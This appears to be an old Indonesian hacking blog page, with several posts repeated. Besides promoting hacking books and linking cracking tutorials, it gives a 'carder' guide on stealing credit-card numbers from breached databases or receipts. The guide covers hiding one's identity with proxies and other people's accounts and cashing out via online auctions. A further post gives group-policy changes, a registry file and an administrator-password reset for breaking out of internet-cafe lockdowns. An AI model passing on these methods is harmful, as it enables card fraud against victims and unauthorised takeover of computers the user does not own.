Kedua buku ini sudah bisa didapatkan di toko-toko buku seperti gramedia matraman, gramedia taman anggrek, gramedia, kepala gading, serta toko-toko buku lainnya. Selain itu, buku ini juga sudah tersedia secara online di http://www.jasakom.com/penerbitan
Wednesday, February 28, 2007
Buku Seni Tehnik Hacking dan Windows XXX
Buku Seni Teknik Hacking 2 yang dikenal dengan singkatan STH-2 dan buku Windows XP:XXX telah terbit. Buku Windows STH-2 dijual dengan harga 59.000 sedangkan Windows XP:XXX dijual dengan harga 55.000.
Tuesday, February 27, 2007
Inline Patching
Apa sih Inline Patching...
kalo gk salah ni ye hehe... Inline patching adalah tehnik crack tanpa melakukan unpacking, yaitu hanya mengganti byte tertentu daripada badan program.
Lha kalo unpacking itu apa?
kalo gk salah jg nih.... unpacking adalah menelanjangi program dari yang sebelumnya diprotek ato dilindungi sehingga jika didebug akan dilempar ke badan program proteksi itu sebelum masuk ke badan program yang aslinya.
Program tersebut biasanya dinamakan protektor ato packer, packer lebih ke arah mengecilkan ukuran file daripada yg aslinya.
Tutorialnya dibagi menjadi 4 bagian dan lansung aja donlot :)
1. Inline Patch Part 1 : Testing Application ( http://www.1r15.org/index.php?dl=/articles/orakanggo_testing.rar )
2. Inline Patch Part 2 : Unpacking ( http://www.1r15.org/index.php?dl=/articles/orakanggo_unpack.rar )
3. Inline Patch Part 3 : Patching ( http://www.1r15.org/index.php?dl=/articles/orakanggo_patching.rar )
4. Inline Patch Part 4 : Inlining ( http://www.1r15.org/index.php?dl=/articles/orakanggo_inlined.rar )
Password RAR File : http://www.1r15.org
thanks,
kalo gk salah ni ye hehe... Inline patching adalah tehnik crack tanpa melakukan unpacking, yaitu hanya mengganti byte tertentu daripada badan program.
Lha kalo unpacking itu apa?
kalo gk salah jg nih.... unpacking adalah menelanjangi program dari yang sebelumnya diprotek ato dilindungi sehingga jika didebug akan dilempar ke badan program proteksi itu sebelum masuk ke badan program yang aslinya.
Program tersebut biasanya dinamakan protektor ato packer, packer lebih ke arah mengecilkan ukuran file daripada yg aslinya.
Tutorialnya dibagi menjadi 4 bagian dan lansung aja donlot :)
1. Inline Patch Part 1 : Testing Application ( http://www.1r15.org/index.php?dl=/articles/orakanggo_testing.rar )
2. Inline Patch Part 2 : Unpacking ( http://www.1r15.org/index.php?dl=/articles/orakanggo_unpack.rar )
3. Inline Patch Part 3 : Patching ( http://www.1r15.org/index.php?dl=/articles/orakanggo_patching.rar )
4. Inline Patch Part 4 : Inlining ( http://www.1r15.org/index.php?dl=/articles/orakanggo_inlined.rar )
Password RAR File : http://www.1r15.org
thanks,
Saturday, February 24, 2007
Carder
[1]. Apa itu carder?
--------------------
Ketika dunia web pertamakali memperkenalkan keindahannya, mulailah muncul beberapa aksi pengrusakan-pengrusakan kecil yang dilakukan oleh para script kiddies. Tujuan utama tak lain hanyalah demi mendapatkan pengakuan (dari kelompoknya sendiri maupun masyarakat). Seiring dengan maraknya organisasi-organisasi yang menerapkan apikasi bisnis berbasis web, tujuan itu mulai berubah. Bukan lagi pengakuan yang mereka incar, tetapi aksi-aksi itu mulai mengarah pada sesuatu yang selama ini populer di kalangan umat manusia hehehe.. apalagi kalo bukan dengan tujuan kekayaan ($uang$). Professional dalam bidang ini mampu menyusup dalam sistem korban tanpa terdeteksi, keudian mencari file database atau log-log transaksi untuk mendapatkan rincian nomor-nomor kartu kredit. Mereka inilah yang kemudian disebut sebagai CARDER, para perampok cyber.
Pada intinya, untuk melakukan penyalahgunaan kartu kredit, yang diperlukan hanyalah nomor kartu, nama pemilik, dan tangal kadaluwarsanya. Jadi, misi utama seorang carder adalah bagaimana mendapatkan nomor-nomor kartu kredit orang lain, kemudian melakuakn transaksi pembelian dengan nomor kartu kredit itu.
[2]. Yang Harus Anda Sadari
---------------------------
Sebelum anda memutuskan untuk terjun di dunia carder, ada baiknya anda menyadari dan mengetahui hal-hal berikut:
--[1. Carding adalah sebuah perbuatan dosa yang pelakunya jelas-jeas akan mendapatkan siksa di Neraka. Apapun agama anda (jika anda benar-benar orang beragama), saya rasa tidak satupun dari ajaran agama yang ada memperbolehkan pemeluknya untuk menjadi pencuri.
--[2. Dunia carding bukanlah taman bermain anak-anak yang bisa anda tinggalkan begitu saja setelah anda bermain di dalamnya. Anda bisa, dan sangat mungkin untuk dilacak. Sekali saja anda tertangkap, anda akan menghabiskan sisa umur anda dengan penuh rasa sesal di balik jeruji besi. Nama anda dan keluarga anda akan tercemar, dan satu hal yang perlu anda ingat, tak satupun dari perusahaan yang ada sat ini mau menerima mantan narapidana sebagai karyawan.
--[3. Dalam melakukan aksi carding:
- gunakan line telepon yang bukan milik anda.
- Pakailah account Internet yang juga bukan milik anda.
- Jangan sekali-kali meninggalkan nama asli, handle asli, atau nama orang lain yang mengenal anda.
--[4. Gunakan proxy anonymouse atau elite proxy. Manfaatkan anonymizer, namun perlu anda ketahuai bahwa biasanya anonymizer menolak untuk melayani protokol http over ssl (https://). Ingat selalu bahwa setiap transaksi di Internet pasti mencatat alamat IP anda.
--[5. Bersihka jejak yang tertinggal di komputer tempat anda melakukan aksi menggunakan penghapus jejak yang telah banyak beredar di Inet. Dan jika anda cukup paranoid, hapus sidik jari!! :)
[3]. Kemampuan dasar
--------------------
Jika anda benar-benar ingin menjadi professional carder, setidaknya ada beberapa kemampuan dasar yang harus anda kuasai:
--[3.1 Pelajari web programming
Ini merupakan hal yang paling mendasar. Anda akan banyak sekali membutuhkan kemampuan ini nantinya. mJika anda belum pernah mengenal bahasa pemrograman web apapun, anda bisa memulai dengan belajar HTML. Sebagai upaya latihan, anda bisa memulai dengan membuat home page sederhana. Tentu saja anda harus memuai segalanya dari nol, dalam artian jangan menggunakan HTML generator. Belajarlah menulis kodenya sendiri!
Setelah itu anda dapat mencoba bahasa-bahasa web lain yang sedikit lebih rumit. Daftar bahasa-bahasa pemrograman web beserta gambaran singkatnya bisa anda baca pada tulisan saya yang berjudul “Mengenal Bahasa-Bahasa Pemrogramana Web” di www.spyrozone.tk. Pelajari dan pahami cara kerja bahasa-bahasa itu, bagaimana sifat-sifatnya, cari letak kelemahannya serta apa saja resiko-resiko keamanan yang potensial dari bahasa-bahasa itu.
--[3.2 Mengenal teknologi web server dan database server
Web server dan database server merupakan komponen utama dari suatu aplikasi Internet yang tangguh. Untuk satu alasan ini, dan juga banayka alasan-alasan lainnya, menyebabkan begitu banyak attacker menjadikannya sebagai sasaran empuk. Dengan memahami teknologi-teknologi web server seorang carder akan mampu meneliti dan mencari celah-celah keamanan di baliknya. Setelah celah keamanan itu ditemukan, barulah sang carder menerobos system dengan memanfaatkan celah tadi untuk kemudian mencari file database yang berisi rincian data kartu kredit pelanggan.
Database adalah sebuah mekanisme penyimpanan dan pencarian data bagi para pelanggan, istilah pelanggan disini bisa juga diasumsikan sebagai carder ^_^. Ironisnya, kerentanan database ternyata tidak terlalu diperhatikan oleh sebagian webmaster.
Pelajari perintah-perintah SQL, ketahui database-database default pada suatu sistem server SQL dan beberapa fungsi-fungsi yang ada padanya. Ketahui juga bagaimana bentuk setting default pada database itu, biasanya (dan seringkali) terdapat banyak sekali celah keamanan pada konfigurasi default database dan web server.
--[3.3 Memahami seluk beluk URL
URL merupakan sebuah celah yang sangat sempit dan sangat halus, sebuah mekanisme untuk mengenali sumber-sumber pada web, SSL, server FTP dan masih banyak lagi. Pelajari seluk-beluk URL, anda akan memiliki kemampuan untuk melakukan identifikasi teknologi, memahami apa yang ada dibaliknya. Hal ini akan sangat membantu anda. Pada kenyataannya, dewasa ini banyak serangan-serangan mematikan yang terjadi dan pencurian-pencurian file database dilakukan hanya dengan berbekal browser. Semua itu bisa dilakukan dikarenakan kemampuan yang baik dalam menganalisis struktur URL yang didasari oleh pengetahuan yang cukup mengenai seluk-beluk URL
--[3.4 Mengikuti perkembangan teknologi Troli Belanja
Teknologi yang mendukung komponen troli belanja adalah session managemen, statetracking dan antarmuka navigasi Front-End. Pemrogramannya sendiri dilakukan dengan menggunakan bahasa script seperti PHP, PERL, ASP, dan bahkan terkadang juga menggunakan komponen-komponen yang sudah ada, misalnya saja class Java.
Pelajari dan ikuti perkembangan teknologi troli belanja. Ada begitu banyak troli belanja yang kurang baik penerapannya dan memungkinkan untuk digunakan sebagai alat eksekusi jarak jauh melalui HTTP. Beberapa tehnik exploitasinya sudah pernah saya posting di www.spyrozone.tk , silahkan anda baca-baca arsip lama.
[4]. Apa yang harus dilakukan setelah mendapat kartunya?
---------------------------------------------------------
Sudah mendapat kartu yang valid bukan berarti semuanya telah sukses. Untuk bisa mendapatkan barang di tangan anda, paling tidak anda sudah harus familiar dengan kata-kata berikut: Fraud buyer, Fraud seller, tctred, zip, black list country, payPal , Yahoo! Auction, Ebay dsb... Kemampuan yang baik dalam berbahasa Inggris juga sangat dibutuhkan :)
Jika itu semua sudah anda pahami, maka kini saatnya untuk berbelanja :) Di Indonesia mungkin agak sedikit sulit digunakan karena kebanyakan bisnis komersil yang ada akan memeriksa secara detail data-data nomor kartu kredit tersebut. Jika anda punya rekan di luar negeri, hal itu akan sangat membantu karena prosedur disana pada umumnya tidak serumit di Indonesia.
Beberapa hal yang populer dilakukan oleh para ABG adalah dengan menggunakan nomor-nomor itu untuk melakukan registrasi member situs-situs porno. *_^ Ada pula yang memakai cc curian untuk membeli domain situs pribadi.
Perlu anda ketahui bahwa cc curian biasanya tidak akan bertahan lama. Jarang sekali ada CC curian yang “panjang umur” :P . Adakalanya hanya berumur satu hari, kurang dari 12 jam, bahkan tak jarang sesaat setelah anda meg-order barang perusahaan terkait akan merasakan adanya kejanggalan-kejanggalan. Atau mungkin sang pemilik akan menemukan ketidakberesan dalam laporan rekening kartu kreditnya.
Apapun yang akan anda lakukan dengan nomor cc itu, elalu hati-hatilah dalam menjaga identitas. Jangan pernah memiliki anggapan bahwa anda tidak akan dilacak atau tertangkap. Kemungkinan itu selalu ada. Kurangi frekuensi transaksi ilegal yang anda lakukan karea hal itu juga berpengaruh dalam memperpendek kartu kredit (curian) anda.
[5]. Adakah cara mudah menjadi carder?
-------------------------------------
Jawaban dari pertanyaan itu adalah.. “ADA!” namun anda akan kehilangan kesan profesional dan hasil yang anda dapat juga kurang (bahkan tidak) memuaskan. Di kota-kota besar dimana penggunaan kartu kredit sedemikian meluas, anda bisa dengan mudah mendapatkan nomor CC dengan mengaduk-aduk tempat sampah toko grosir atau pasar swalayan besar untuk mendapat bon kartu kredit pelanggan. Pekerjaan sebagai penjaga kasir di swalayan-swalayan besar (jika anda perempuan) juga potensial untuk mendapatkan CC pembeli. Sempatkan saja untuk menyalin nomor-nomor itu secara sembunyi-sembunyi.
Bagaimana dengan CC generator? Pada umumnya jika anda menggunakan CC generator maka anda akan gagal melakukan transaksi. Pada kenyataannya, nomor-nomor CC yang dhasilkan itu hanyalah nomor-nomor fiktif. Saat ini hampir-hampir tidak bisa ditemui lagi toko elektronis yang melakukan pengecekan berdasarkan algoritma keempatbelas digit kartu kredit saja.
Pada umumnya mereka akan melakukan pemeriksaan berdasarkan:
- Nama pemegang kartu
- Nomor kartunya
- Kode pos dari alamat pemegang kartu
Jadi, sebaiknya anda tidak usah terlalu percaya dengan CC generator yang banyak beredar di Internet. Banyak CC generator yang ada hanya ditujukan untuk menipu para script kiddies.
---// Penutup
Hanya inilah panduan singkat yang bisa saya berikan kepada anda. Hati-hatilah selalu jika anda berniat menjadi carder. Berfikirlah sebelum bertindak sebelum anda menyesal nantinya. Mungkin dibalik jeruji besi itulah nanti anda akan menyadari bahwa ternyata anda tidak secerdas yang anda kira... ^_^
--------------------
Ketika dunia web pertamakali memperkenalkan keindahannya, mulailah muncul beberapa aksi pengrusakan-pengrusakan kecil yang dilakukan oleh para script kiddies. Tujuan utama tak lain hanyalah demi mendapatkan pengakuan (dari kelompoknya sendiri maupun masyarakat). Seiring dengan maraknya organisasi-organisasi yang menerapkan apikasi bisnis berbasis web, tujuan itu mulai berubah. Bukan lagi pengakuan yang mereka incar, tetapi aksi-aksi itu mulai mengarah pada sesuatu yang selama ini populer di kalangan umat manusia hehehe.. apalagi kalo bukan dengan tujuan kekayaan ($uang$). Professional dalam bidang ini mampu menyusup dalam sistem korban tanpa terdeteksi, keudian mencari file database atau log-log transaksi untuk mendapatkan rincian nomor-nomor kartu kredit. Mereka inilah yang kemudian disebut sebagai CARDER, para perampok cyber.
Pada intinya, untuk melakukan penyalahgunaan kartu kredit, yang diperlukan hanyalah nomor kartu, nama pemilik, dan tangal kadaluwarsanya. Jadi, misi utama seorang carder adalah bagaimana mendapatkan nomor-nomor kartu kredit orang lain, kemudian melakuakn transaksi pembelian dengan nomor kartu kredit itu.
[2]. Yang Harus Anda Sadari
---------------------------
Sebelum anda memutuskan untuk terjun di dunia carder, ada baiknya anda menyadari dan mengetahui hal-hal berikut:
--[1. Carding adalah sebuah perbuatan dosa yang pelakunya jelas-jeas akan mendapatkan siksa di Neraka. Apapun agama anda (jika anda benar-benar orang beragama), saya rasa tidak satupun dari ajaran agama yang ada memperbolehkan pemeluknya untuk menjadi pencuri.
--[2. Dunia carding bukanlah taman bermain anak-anak yang bisa anda tinggalkan begitu saja setelah anda bermain di dalamnya. Anda bisa, dan sangat mungkin untuk dilacak. Sekali saja anda tertangkap, anda akan menghabiskan sisa umur anda dengan penuh rasa sesal di balik jeruji besi. Nama anda dan keluarga anda akan tercemar, dan satu hal yang perlu anda ingat, tak satupun dari perusahaan yang ada sat ini mau menerima mantan narapidana sebagai karyawan.
--[3. Dalam melakukan aksi carding:
- gunakan line telepon yang bukan milik anda.
- Pakailah account Internet yang juga bukan milik anda.
- Jangan sekali-kali meninggalkan nama asli, handle asli, atau nama orang lain yang mengenal anda.
--[4. Gunakan proxy anonymouse atau elite proxy. Manfaatkan anonymizer, namun perlu anda ketahuai bahwa biasanya anonymizer menolak untuk melayani protokol http over ssl (https://). Ingat selalu bahwa setiap transaksi di Internet pasti mencatat alamat IP anda.
--[5. Bersihka jejak yang tertinggal di komputer tempat anda melakukan aksi menggunakan penghapus jejak yang telah banyak beredar di Inet. Dan jika anda cukup paranoid, hapus sidik jari!! :)
[3]. Kemampuan dasar
--------------------
Jika anda benar-benar ingin menjadi professional carder, setidaknya ada beberapa kemampuan dasar yang harus anda kuasai:
--[3.1 Pelajari web programming
Ini merupakan hal yang paling mendasar. Anda akan banyak sekali membutuhkan kemampuan ini nantinya. mJika anda belum pernah mengenal bahasa pemrograman web apapun, anda bisa memulai dengan belajar HTML. Sebagai upaya latihan, anda bisa memulai dengan membuat home page sederhana. Tentu saja anda harus memuai segalanya dari nol, dalam artian jangan menggunakan HTML generator. Belajarlah menulis kodenya sendiri!
Setelah itu anda dapat mencoba bahasa-bahasa web lain yang sedikit lebih rumit. Daftar bahasa-bahasa pemrograman web beserta gambaran singkatnya bisa anda baca pada tulisan saya yang berjudul “Mengenal Bahasa-Bahasa Pemrogramana Web” di www.spyrozone.tk. Pelajari dan pahami cara kerja bahasa-bahasa itu, bagaimana sifat-sifatnya, cari letak kelemahannya serta apa saja resiko-resiko keamanan yang potensial dari bahasa-bahasa itu.
--[3.2 Mengenal teknologi web server dan database server
Web server dan database server merupakan komponen utama dari suatu aplikasi Internet yang tangguh. Untuk satu alasan ini, dan juga banayka alasan-alasan lainnya, menyebabkan begitu banyak attacker menjadikannya sebagai sasaran empuk. Dengan memahami teknologi-teknologi web server seorang carder akan mampu meneliti dan mencari celah-celah keamanan di baliknya. Setelah celah keamanan itu ditemukan, barulah sang carder menerobos system dengan memanfaatkan celah tadi untuk kemudian mencari file database yang berisi rincian data kartu kredit pelanggan.
Database adalah sebuah mekanisme penyimpanan dan pencarian data bagi para pelanggan, istilah pelanggan disini bisa juga diasumsikan sebagai carder ^_^. Ironisnya, kerentanan database ternyata tidak terlalu diperhatikan oleh sebagian webmaster.
Pelajari perintah-perintah SQL, ketahui database-database default pada suatu sistem server SQL dan beberapa fungsi-fungsi yang ada padanya. Ketahui juga bagaimana bentuk setting default pada database itu, biasanya (dan seringkali) terdapat banyak sekali celah keamanan pada konfigurasi default database dan web server.
--[3.3 Memahami seluk beluk URL
URL merupakan sebuah celah yang sangat sempit dan sangat halus, sebuah mekanisme untuk mengenali sumber-sumber pada web, SSL, server FTP dan masih banyak lagi. Pelajari seluk-beluk URL, anda akan memiliki kemampuan untuk melakukan identifikasi teknologi, memahami apa yang ada dibaliknya. Hal ini akan sangat membantu anda. Pada kenyataannya, dewasa ini banyak serangan-serangan mematikan yang terjadi dan pencurian-pencurian file database dilakukan hanya dengan berbekal browser. Semua itu bisa dilakukan dikarenakan kemampuan yang baik dalam menganalisis struktur URL yang didasari oleh pengetahuan yang cukup mengenai seluk-beluk URL
--[3.4 Mengikuti perkembangan teknologi Troli Belanja
Teknologi yang mendukung komponen troli belanja adalah session managemen, statetracking dan antarmuka navigasi Front-End. Pemrogramannya sendiri dilakukan dengan menggunakan bahasa script seperti PHP, PERL, ASP, dan bahkan terkadang juga menggunakan komponen-komponen yang sudah ada, misalnya saja class Java.
Pelajari dan ikuti perkembangan teknologi troli belanja. Ada begitu banyak troli belanja yang kurang baik penerapannya dan memungkinkan untuk digunakan sebagai alat eksekusi jarak jauh melalui HTTP. Beberapa tehnik exploitasinya sudah pernah saya posting di www.spyrozone.tk , silahkan anda baca-baca arsip lama.
[4]. Apa yang harus dilakukan setelah mendapat kartunya?
---------------------------------------------------------
Sudah mendapat kartu yang valid bukan berarti semuanya telah sukses. Untuk bisa mendapatkan barang di tangan anda, paling tidak anda sudah harus familiar dengan kata-kata berikut: Fraud buyer, Fraud seller, tctred, zip, black list country, payPal , Yahoo! Auction, Ebay dsb... Kemampuan yang baik dalam berbahasa Inggris juga sangat dibutuhkan :)
Jika itu semua sudah anda pahami, maka kini saatnya untuk berbelanja :) Di Indonesia mungkin agak sedikit sulit digunakan karena kebanyakan bisnis komersil yang ada akan memeriksa secara detail data-data nomor kartu kredit tersebut. Jika anda punya rekan di luar negeri, hal itu akan sangat membantu karena prosedur disana pada umumnya tidak serumit di Indonesia.
Beberapa hal yang populer dilakukan oleh para ABG adalah dengan menggunakan nomor-nomor itu untuk melakukan registrasi member situs-situs porno. *_^ Ada pula yang memakai cc curian untuk membeli domain situs pribadi.
Perlu anda ketahui bahwa cc curian biasanya tidak akan bertahan lama. Jarang sekali ada CC curian yang “panjang umur” :P . Adakalanya hanya berumur satu hari, kurang dari 12 jam, bahkan tak jarang sesaat setelah anda meg-order barang perusahaan terkait akan merasakan adanya kejanggalan-kejanggalan. Atau mungkin sang pemilik akan menemukan ketidakberesan dalam laporan rekening kartu kreditnya.
Apapun yang akan anda lakukan dengan nomor cc itu, elalu hati-hatilah dalam menjaga identitas. Jangan pernah memiliki anggapan bahwa anda tidak akan dilacak atau tertangkap. Kemungkinan itu selalu ada. Kurangi frekuensi transaksi ilegal yang anda lakukan karea hal itu juga berpengaruh dalam memperpendek kartu kredit (curian) anda.
[5]. Adakah cara mudah menjadi carder?
-------------------------------------
Jawaban dari pertanyaan itu adalah.. “ADA!” namun anda akan kehilangan kesan profesional dan hasil yang anda dapat juga kurang (bahkan tidak) memuaskan. Di kota-kota besar dimana penggunaan kartu kredit sedemikian meluas, anda bisa dengan mudah mendapatkan nomor CC dengan mengaduk-aduk tempat sampah toko grosir atau pasar swalayan besar untuk mendapat bon kartu kredit pelanggan. Pekerjaan sebagai penjaga kasir di swalayan-swalayan besar (jika anda perempuan) juga potensial untuk mendapatkan CC pembeli. Sempatkan saja untuk menyalin nomor-nomor itu secara sembunyi-sembunyi.
Bagaimana dengan CC generator? Pada umumnya jika anda menggunakan CC generator maka anda akan gagal melakukan transaksi. Pada kenyataannya, nomor-nomor CC yang dhasilkan itu hanyalah nomor-nomor fiktif. Saat ini hampir-hampir tidak bisa ditemui lagi toko elektronis yang melakukan pengecekan berdasarkan algoritma keempatbelas digit kartu kredit saja.
Pada umumnya mereka akan melakukan pemeriksaan berdasarkan:
- Nama pemegang kartu
- Nomor kartunya
- Kode pos dari alamat pemegang kartu
Jadi, sebaiknya anda tidak usah terlalu percaya dengan CC generator yang banyak beredar di Internet. Banyak CC generator yang ada hanya ditujukan untuk menipu para script kiddies.
---// Penutup
Hanya inilah panduan singkat yang bisa saya berikan kepada anda. Hati-hatilah selalu jika anda berniat menjadi carder. Berfikirlah sebelum bertindak sebelum anda menyesal nantinya. Mungkin dibalik jeruji besi itulah nanti anda akan menyadari bahwa ternyata anda tidak secerdas yang anda kira... ^_^
Trik Jitu Ampuh Menghadapi Billing Explorer yang mematikan akses bila sedang berinternet
Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka,
klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan...
apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...
==> Pertama Buka GPEdit.msc dulu
caranya:
C:\Windows\System32\GPEdit.msc <-- double Click
------------------------------------------ start. ------------------------------------------
--------------------------------------- GPEdit.msc ---------------------------------------
1. Jika Klik Kanan di Desktop tidak bisa
Masuk Ke GPEdit.msc
Masuk ke [User Configuration/Administrative Templates/Desktop]
- Disable (Hide and disable all items on the desktop)
Jika MyComputer tidak ada
- Disable (Remove My Computer icon on the Desktop)
2. Jika Ingin mengubah properties pada taskbar start menu
masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]
- Disable (Prevent changes to Taskbar and Start Menu Settings)
Jika Menu Run tidak muncul
- Disable (Remove Run menu from Start Menu)
Jika menu pada taskbar saat klik kanan tidak muncul
- Disable (Remove access to the context menus for the taskbar)
3. Apabila Control Panel tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/Control Panel]
- Disable (Prohibit access to the Control Panel)
4. Jika Command Prompt tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System]
- Disable (Prevent access to the command prompt)
Jika Registry Editor tidak bisa di akses
- Disable (Prevent access to registry editing tools)
5. Jika Task Manager tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]
- Disable (Remove Task Manager)
6. Jika Folder Options pada Windows Explorer tidak muncul
Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]
- Disable (Remove these Folder Options menu item from the Tools menu)
Jika Windows Key tidak berfungsi
- Disable (Turn off Windows+X hotkeys)
--------------------------------------- GPEdit.msc ---------------------------------------
------------------------------------------- end --------------------------------------------
==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <-- double Click
--- atau ---
C:\Windows\regedit.exe <-- double Click
------------------------------------------ start. ------------------------------------------
--------------------------------------- Regedit. ---------------------------------------
Regedit4
[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000000
"DisableRegistryTools"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]
"Hidden"=dword:00000000
"HideFileExt"=dword:00000000
"ShowSuperHidden"=dword:00000000
--------------------------------------- Regedit. ---------------------------------------
------------------------------------------- end --------------------------------------------
==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x)
caranya:
C:\Windows\System32\compmgmt.msc <-- double Click
------------------------------------------ start. ------------------------------------------
------------------------------------ Administrator. -------------------------------------
Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User
- Klik kanan Administrator -> Set Password
- Ketik New Password: **********
Confirm Password: **********
Selesai deh!!!!!!!!!!!!!
------------------------------------ Administrator. -------------------------------------
------------------------------------------- end --------------------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
---------------------------------------------------------------------------------------------
Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus
--------------------------------------- Bonus - Bonus ---------------------------------------
Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as...
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba
Contoh lain2nya dibawah ini...........
1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe
2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe
3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe
4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc
5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc
6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc
7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop
8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc
klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan...
apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...
==> Pertama Buka GPEdit.msc dulu
caranya:
C:\Windows\System32\GPEdit.msc <-- double Click
------------------------------------------ start. ------------------------------------------
--------------------------------------- GPEdit.msc ---------------------------------------
1. Jika Klik Kanan di Desktop tidak bisa
Masuk Ke GPEdit.msc
Masuk ke [User Configuration/Administrative Templates/Desktop]
- Disable (Hide and disable all items on the desktop)
Jika MyComputer tidak ada
- Disable (Remove My Computer icon on the Desktop)
2. Jika Ingin mengubah properties pada taskbar start menu
masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]
- Disable (Prevent changes to Taskbar and Start Menu Settings)
Jika Menu Run tidak muncul
- Disable (Remove Run menu from Start Menu)
Jika menu pada taskbar saat klik kanan tidak muncul
- Disable (Remove access to the context menus for the taskbar)
3. Apabila Control Panel tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/Control Panel]
- Disable (Prohibit access to the Control Panel)
4. Jika Command Prompt tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System]
- Disable (Prevent access to the command prompt)
Jika Registry Editor tidak bisa di akses
- Disable (Prevent access to registry editing tools)
5. Jika Task Manager tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]
- Disable (Remove Task Manager)
6. Jika Folder Options pada Windows Explorer tidak muncul
Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]
- Disable (Remove these Folder Options menu item from the Tools menu)
